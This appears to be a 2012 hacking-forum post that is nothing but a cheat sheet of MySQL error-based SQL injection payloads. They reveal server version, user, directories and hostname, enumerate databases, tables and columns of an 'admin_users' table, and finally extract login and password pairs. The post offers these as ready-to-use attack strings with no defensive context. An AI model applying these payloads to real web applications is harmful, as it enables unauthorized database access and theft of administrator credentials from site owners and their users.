Cifre Posted November 15, 2012 Report Posted November 15, 2012 (edited) Error Based Injection:Version:or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1--+User:or 1 group by concat_ws(0x7e,user(),floor(rand(0)*2)) having min(0) or 1--DataDir:or 1 group by concat_ws(0x7e,@@datadir,floor(rand(0)*2)) having min(0) or 1--VersionCompileOs:or 1 group by concat_ws(0x7e,@@version_compile_os,floor(rand(0)*2)) having min(0) or 1--HostName:or 1 group by concat_ws(0x7e,@@hostname,floor(rand(0)*2)) having min(0) or 1--Basedir:or 1 group by concat_ws(0x7e,@@basedir,floor(rand(0)*2)) having min(0) or 1--Database:and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)Extract tables from database:and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0xHexDatabase limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)Extract columns from "admin_users":and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0xHexadmin_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)Table1,2,3,4,etc: limit 1,1; limit 2,1; limit 3,1; limit 4,1:Login, and Password:and (select 1 from (select count(*),concat((select(select concat(cast(concat(login,0x7e,password) as char),0x7e)) from database.admin_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) Edited November 15, 2012 by Cifre Quote
